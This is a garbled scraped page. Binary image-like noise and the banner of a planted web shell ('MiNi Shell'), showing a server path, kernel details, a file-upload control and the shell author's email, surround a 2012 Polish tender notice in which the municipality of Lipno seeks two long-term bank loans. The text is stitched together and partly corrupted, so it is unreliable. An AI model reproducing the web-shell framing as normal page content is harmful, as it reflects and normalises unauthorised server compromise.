JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/125069-N-2012.html

<p class="kh_header"><b>Lipno: Udzielenie i obsługa kredytu długoterminowego w wysokości 1.000.000,00 zł na spłatę wcześniej zaciągniętych zobowiązań z tytułu pożyczek i kredytów oraz w wysokości 660.000,00 zł na dofinansowanie przedsięwzięcia inwestycyjnego realizowanego przy współudziale środków unijnych pn. Budowa ścieżki rowerowej przy ul. Lipowej w Wilkowicach.</b><br>
<b>Numer ogłoszenia: 125069 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lipno , ul. Powstańców Wielkopolskich 9, 64-111 Lipno, woj. wielkopolskie, tel. 065 5340127, faks 065 5340109.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lipno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie i obsługa kredytu długoterminowego w wysokości 1.000.000,00 zł na spłatę wcześniej zaciągniętych zobowiązań z tytułu pożyczek i kredytów oraz w wysokości 660.000,00 zł na dofinansowanie przedsięwzięcia inwestycyjnego realizowanego przy współudziale środków unijnych pn. Budowa ścieżki rowerowej przy ul. Lipowej w Wilkowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest udzielenie i obsługa kredytu długoterminowego : 
Część I : 
W wysokości 1.000.000,00 zł, na spłatę wcześniej zaciągniętych zobowiązań z tytułu  pożyczek i kredytów.
Część II
W wysokości 660.000,00 zł na dofinansowanie przedsięwzięcia inwestycyjnego realizowanego przy współudziale środków unijnych pn. Budowa ścieżki rowerowej przy ul. Lipowej w Wilkowicach.
2. Uruchomienie kredytów będzie następować na rachunek podstawowy Zamawiającego. Wysokość i termin przekazania środków będą każdorazowo uzgadniane z Wykonawcą i przedkładane w postaci wniosku z jednodniowym wyprzedzeniem
3. Okres spłaty kredytu na  lata począwszy od 2014 r. tj.:
1) Dla kredytu w wysokości 1.000.000,00 zł :
- w roku 2014 - 160.000,00 zł,
- w roku 2015 - 160.000,00 zł,
- w roku 2016 - 160.000,00 zł,
- w roku 2017 - 160.000,00 zł,
- w roku 2018 - 160.000,00 zł,
- w roku 2019 - 200.000,00 zł,
2) Dla kredytu w wysokości 660.000,00 zł :
- w roku 2014 - 120.000,00 zł,
- w roku 2015 - 120.000,00 zł,
- w roku 2016 - 120.000,00 zł,
- w roku 2017 - 120.000,00 zł,
- w roku 2018 - 120.000,00 zł,
- w roku 2019 - 60.000,00 zł.
4. Termin spłaty kapitału :
1) Dla kredytu w wysokości 1.000.000,00 zł do 31 grudnia 2019 r.
2) Dla kredytu w wysokości 660.000,00 zł do 31 marca 2019 r.
5. Terminy spłaty rat kredytu: 
1) Dla kredytu w wysokości 1.000.000,00 zł :
Począwszy od 2014 do 2018 roku ostatniego dnia miesiąca lutego, czerwca, września i grudnia w równych 4 ratach po 40 000 zł oraz w równych 4 ratach po   50 000 zł ostatniego dnia wymienionych miesięcy w roku 2019.
2) Dla kredytu w wysokości 660.000,00 zł :
Począwszy od 2014 do 2018 roku ostatniego dnia miesiąca marca i września w równych 2 ratach po 60 000 zł oraz jedna rata w wysokości 60 000 zł ostatniego dnia marca w roku 2019.
6. Waluta: PLN.
7. Karencja w spłacie kapitału :
1) Dla kredytu w wysokości 1.000.000,00 zł :
 - do dnia 28 lutego 2014 r.
2) Dla kredytu w wysokości 660.000,00 zł :
- do dnia 31 marca 2014 r. 
8. Spłata odsetek - miesięczna.
9. Spłaty odsetek oraz rat kredytów nastąpi na podstawie zawiadomienia przesłanego przez bank.
10. Stawka bazowa kredytów - WIBOR 1M, oprocentowanie kredytów równa się WIBOR 1M + m (stała marża banku). 
11. Wykorzystanie kredytów: do 31 grudnia 2012 roku z możliwością podzielenia na transze.
12. Termin postawienia do dyspozycji środków finansowych :
1) Dla kredytu w wysokości 1.000.000,00 zł.
- Transza I : 500.000,00 zł - od 1 lipca 2012 r.
- Transza II: 500.000,00 zł - od 1 października 2012 r.
2) Dla kredytu w wysokości 660.000,00 zł.
- Transza I : 300.000,00 zł - od 1 września 2012 r.
- Transza II: 360.000,00 zł - od 1 listopada 2012 r.
13. Odsetki będą naliczane od faktycznie wykorzystanych środków. Środki niewykorzystane powinny być dostępne i zaliczone do transzy kolejnej, bez pobierania opłaty za niewykorzystane środki. Postawienie środków do dyspozycji Zamawiającego nie będzie stanowiło podstawy do naliczania odsetek.
14. Zamawiający zastrzega sobie prawo nieskorzystania z kredytu w pełnej wysokości - bez konieczności poniesienia z tego tytułu dodatkowych opłat. Ww. sytuacji zamawiający nie poniesie żadnych dodatkowych kosztów z powodu nie wykorzystania przyznanych środków finansowych.
15. Dopuszcza się możliwość wcześniejszej spłaty części lub całości kredytu po uprzednim 3 dniowym powiadomieniu banku - bez konieczności ponoszenia dodatkowych opłat.
16. Jeżeli termin spłaty odsetek lub rat kapitałowych przypadnie na sobotę, niedzielę, święto lub inny dzień ustawowo wolny od pracy, spłata odsetek lub rat kapitałowych nastąpi następnego dnia roboczego po tym terminie.
17. Prowizja od uruchamianego kredytu, będzie płatna proporcjonalnie do wysokości uruchamianej transzy (dla potrzeb przygotowania oferty zakłada się, że kredyt zostanie wykorzystany w pełnej wysokości).
18. Za rok obrachunkowy przyjmuje się 365 dni, a w przypadku roku przestępnego 366 dni.
19. Zabezpieczenie kredytu dopuszczalne przez zamawiającego: weksel własny in blanco wraz z deklaracją wekslową.
20. Opinię RIO o możliwości zaciągnięcia i spłaty wnioskowanego kredytu zamawiający dostarczy po wyborze wykonawcy.
21. Dokumenty do oceny zdolności kredytowej zamawiającego, wg wyboru i potrzeb wykonawcy, są do wglądu w siedzibie zmawiającego.
22. Do udziału w przetargu dopuszcza się możliwość udzielenia kredytu z zagranicznej linii kredytowej, którą dysponują Europejski Bank Inwestycyjny i/lub Bank Rozwoju Rady Europy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie żąda się wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy posiadający zezwolenia uprawniające do wykonywania czynności bankowych na podstawie ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 202 r. Nr 72 poz. 665 z póź. zm.). Spełnienie warunku zostanie ocenione na podstawie złożonych dokumentów, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa sie minimalnych standardów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa sie minimalnych standardów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa sie minimalnych standardów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa sie minimalnych standardów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy z załączonym harmonogramem spłaty kredytu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej  umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w następujących przypadkach:
1) Zmniejszenia marży kredytu przez bank  (lub zwiększenia upustu) - na wniosek (propozycję) wybranego banku, który udzielił Zamawiającemu kredytu.
2) Skrócenia okresu spłaty kredytu oraz zmniejszenia kwoty kredytu  - w przypadku uzyskania przez Zamawiającego ponadplanowych dochodów własnych.
3) Zmiany przeznaczenia kredytu - w przypadku zmiany budżetu Gminy Lipno.
4) Zmiany terminów dostępności transz kredytu, a także ich wysokości - w przypadku zmiany harmonogramu  realizacji wydatków z kredytu.
5) Zmiany terminów spłat rat kredytu - jeżeli  Zamawiający będzie przewidywał trudności finansowe w dotrzymaniu określonego terminu spłat.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lipno.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Lipno, ul. Powstańców Wlkp. 9, 64-111 Lipno, pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2012 godzina 10:00, miejsce: Urząd Gminy Lipno, ul. Powstańców Wlkp. 9, 64-111 Lipno, pok. nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa nie jest finansowana ze środków Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Udzielenie i obsługa kredytu długoterminowego w wysokości 1.000.000,00 zł, na spłatę wcześniej zaciągniętych zobowiązań z tytułu  pożyczek i kredytów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Uruchomienie kredytu będzie następować na rachunek podstawowy Zamawiającego. Wysokość i termin przekazania środków będą każdorazowo uzgadniane z Wykonawcą i przedkładane w postaci wniosku z jednodniowym wyprzedzeniem
2. Okres spłaty kredytu na lata, począwszy od 2014 r. tj.:
- w roku 2014 - 160.000,00 zł,
- w roku 2015 - 160.000,00 zł,
- w roku 2016 - 160.000,00 zł,
- w roku 2017 - 160.000,00 zł,
- w roku 2018 - 160.000,00 zł,
- w roku 2019 - 200.000,00 zł.
3. Termin spłaty kapitału :
- do 31 grudnia 2019 r.
4. Terminy spłaty rat kredytu: 
Począwszy od 2014 do 2018 roku ostatniego dnia miesiąca lutego, czerwca, września i grudnia w równych 4 ratach po 40 000 zł oraz w równych 4 ratach po  50 000 zł ostatniego dnia wymienionych miesięcy w roku 2019.
5. Waluta: PLN.
6. Karencja w spłacie kapitału :
- do dnia 28 lutego 2014 r.
7. Spłata odsetek - miesięczna.
8. Spłaty odsetek oraz rat kredytów nastąpi na podstawie zawiadomienia przesłanego przez bank.
9. Stawka bazowa kredytów - WIBOR 1M, oprocentowanie kredytów równa się WIBOR 1M + m (stała marża banku). 
10. Wykorzystanie kredytu: do 31 grudnia 2012 roku z możliwością podzielenia na transze.
11. Termin postawienia do dyspozycji środków finansowych :
- Transza I : 500.000,00 zł - od 1 lipca 2012 r.
- Transza II: 500.000,00 zł - od 1 października 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2019.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Udzielenie i obsługa kredytu długoterminowego w wysokości 660.000,00 zł na dofinansowanie przedsięwzięcia inwestycyjnego realizowanego przy współudziale środków unijnych pn. Budowa ścieżki rowerowej przy ul. Lipowej w Wilkowicach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Uruchomienie kredytu będzie następować na rachunek podstawowy Zamawiającego. Wysokość i termin przekazania środków będą każdorazowo uzgadniane z Wykonawcą i przedkładane w postaci wniosku z jednodniowym wyprzedzeniem.
2. Okres spłaty kredytu na lata, począwszy od 2014 r. tj.:
- w roku 2014 - 120.000,00 zł,
- w roku 2015 - 120.000,00 zł,
- w roku 2016 - 120.000,00 zł,
- w roku 2017 - 120.000,00 zł,
- w roku 2018 - 120.000,00 zł,
- w roku 2019 -   60.000,00 zł.
3. Termin spłaty kapitału :
- do 31 marca 2019 r.
4. Terminy spłaty rat kredytu: 
Począwszy od 2014 do 2018 roku ostatniego dnia miesiąca marca i września w równych 2 ratach po 60 000 zł oraz jedna rata w wysokości 60 000 zł ostatniego dnia marca w roku 2019.
5. Waluta: PLN.
6. Karencja w spłacie kapitału :
- do dnia 31 marca 2014 r. 
7. Spłata odsetek - miesięczna.
8. Spłaty odsetek oraz rat kredytów nastąpi na podstawie zawiadomienia przesłanego przez bank.
9. Stawka bazowa kredytów - WIBOR 1M, oprocentowanie kredytów równa się WIBOR 1M + m (stała marża banku). 
10. Wykorzystanie kredytu: do 31 grudnia 2012 roku z możliwością podzielenia na transze.
11. Termin postawienia do dyspozycji środków finansowych :
- Transza I : 300.000,00 zł - od 1 września 2012 r.
- Transza II: 360.000,00 zł - od 1 listopada 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2019.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com